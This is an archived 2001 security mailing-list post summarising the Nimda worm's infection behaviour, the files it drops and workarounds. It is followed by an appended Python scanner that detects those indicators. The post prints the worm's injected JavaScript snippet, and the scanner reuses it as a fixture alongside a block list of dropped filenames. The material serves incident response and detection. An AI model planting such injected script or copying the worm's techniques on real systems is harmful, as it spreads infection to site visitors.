[iwar] [fc:Summary.of.new.virus/worm.-.both.of.the.ones.I.listed.earlier.appear.to.be.the.same.one]

From: Fred Cohen (fc@all.net)
Date: 2001-09-18 14:56:09


To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Date: Tue, 18 Sep 2001 14:56:09 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Summary.of.new.virus/worm.-.both.of.the.ones.I.listed.earlier.appear.to.be.the.same.one]

This is a cumulation of the information I've found on W32.nimda thus far:

W32.nimda is NOT a Code Red variant, and the people who were referring to it as 
"Code Blue" were mistaken...

The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses 
several vulnerabilities in Windows NT and 2000 servers to infect a server, 
and also employs email and web site mobile code to infect Windows 
9x/ME/NT/2k boxes.

During the initial infection of a server, the worm does the following:
        - downloads a file named "admin.dll" via tftp from the system that is trying to infect the target
        - adds the guest account to the local administrators group and activates the account
        - makes sure c$ is shared out
        - copies itself to c, d, and e drives
        - tries to mail itself to email addresses that it discovers on the server
        - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below
        - adds this string to the web pages found on the server:
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
        - scans for and infects other vulnerable IIS servers
        - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. These are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
        - goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
        - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)

If a user views a web site that is hosted on an infected server, the 
following happens:
        - upon viewing an infected page, the mobile code extracts to readme.exe and starts in Windows Media Player (without user intervention)
        - the user's machine becomes infected with W32.nimda at this point in time
        - the worm starts scanning for other vulnerable IIS servers
        - the worm emails itself to everyone in the user's address book
        - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. These are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above.
        - goes through all shared directories and puts riched20.dll in each directory, which is a trojan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory.
        - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only)

It is unknown to me what happens (at this point in time) if a user opens an 
attachment that is sent from an infected site. It is possible that it could 
automatically infect the user's computer using the same methods mentioned 
above.

EVERYONE who uses Internet Explorer to browse the internet should probably do 
one of two things to stop from being automatically infected by W32.nimda (I 
have not tested whether or not turning off JavaScript fixes the problem):
        o) don't browse web pages until Microsoft releases a patch
        o) turn OFF JavaScript

EVERYONE who uses Outlook/Outlook Express should, at the very least, not open 
any attachments that they are not expecting. Turning off auto-preview might 
be a good idea as well.

Slashdot has an article discussing this:
http://slashdot.org/articles/01/09/18/151203.shtml

On Tuesday 18 September 2001 13:26, Berislav Kucan wrote:
 NAI avertlabs marked it as "high", but their VIL database is now
 giving some technical errors. These are a few vendor responses (not much
 information though):

 Sophos
 http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

 NAI
 http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

 F-Secure
 http://www.f-secure.com/v-descs/nimda.shtml

 Symantec
 http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

 Also NAI calls it Minda, and not Nimda ;)   From their info it says -
 The virus contains the string: Concept Virus(CV) V.5, Copyright(c) 2001
 R.P.China, so refer to Defcom's Olle Segerdahl post to Incidents and
 Bugtraq...

 Berislav Kucan
 Help Net Security - http://www.net-security.org
 IP-Solutions - http://www.ip-solutions.dk
 E-mail: bkucan@net-security.org
 Phone: +385 91 513 9159

 *********** REPLY SEPARATOR  ***********

 On 9/18/2001 at 10:57 AM Brett Glass wrote:
 At 10:21 AM 9/18/2001, Jay D. Dyson wrote:
         It's a two-prong worm.  It appears to be primarily
 disseminated via e-mail, and then launches its attacks on web hosts upon
 successful infection.
 
 Newsbytes is calling this worm "Code Rainbow," while some of the
 antivirus firms seem to be calling it "W32.Nimda.A@mm".

 ---------------------------------------------------------------------------
 This list is provided by the SecurityFocus ARIS analyzer service.
 For more information on this free incident handling, management
 and tracking system please see: http://aris.securityfocus.com

-- 
"Computer games don't affect kids, I mean if Pacman affected us as kids, 
we'd all be running around in darkened rooms, munching pills, and listening 
to repetitive music." ~unknown
****
Jim Olsen
Systems Administrator
CyberJunkees
****
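As an added example that is not part of the original message, here is a small defender-side scan built only from the indicators the post lists: it flags web pages carrying the injected window.open("readme.eml") snippet and the dropped filenames (sample.nws, desktop.eml, riched20.dll, ...) in shared directories. The directory layout and file contents are constructed here for demonstration.

```python
import os
import re
import tempfile
from pathlib import Path

# Filenames the post says the worm drops into shares / the winnt directory.
DROPPED_NAMES = {"sample.nws", "sample.eml", "desktop.eml", "desktop.nws",
                 "riched20.dll", "readme.exe", "readme.eml", "admin.dll"}

# The injected mobile-code string: a <script> that opens readme.eml in a
# window pushed off-screen (top/left=6000). Matched loosely on case/space.
INJECT_RE = re.compile(
    r'<script[^>]*>\s*window\.open\(\s*"readme\.eml"', re.IGNORECASE)

WEB_EXTS = {".htm", ".html", ".asp"}


def scan_tree(root):
    """Walk root and return a sorted list of (kind, relative_path) findings."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = str(path.relative_to(root))
            if name.lower() in DROPPED_NAMES:          # case-insensitive (NTFS)
                findings.append(("dropped_file", rel))
            if path.suffix.lower() in WEB_EXTS:
                try:
                    text = path.read_text(errors="replace")
                except OSError:
                    continue
                if INJECT_RE.search(text):
                    findings.append(("injected_page", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample tree: a clean page, an injected page, one share."""
    root = Path(tempfile.mkdtemp())
    (root / "wwwroot").mkdir()
    (root / "wwwroot" / "index.html").write_text("<html><body>hi</body></html>")
    (root / "wwwroot" / "news.htm").write_text(
        '<html><script language="JavaScript">window.open("readme.eml", null, '
        '"resizable=no,top=6000,left=6000")</script></html>')
    (root / "share").mkdir()
    (root / "share" / "DESKTOP.EML").write_text("MIME-Version: 1.0\n")
    (root / "share" / "riched20.dll").write_bytes(b"MZ")
    (root / "share" / "report.doc").write_text("fine")
    return root


if __name__ == "__main__":
    for kind, rel in scan_tree(build_sample_tree()):
        print(kind, rel)
```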


------------------
http://all.net/ 




This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT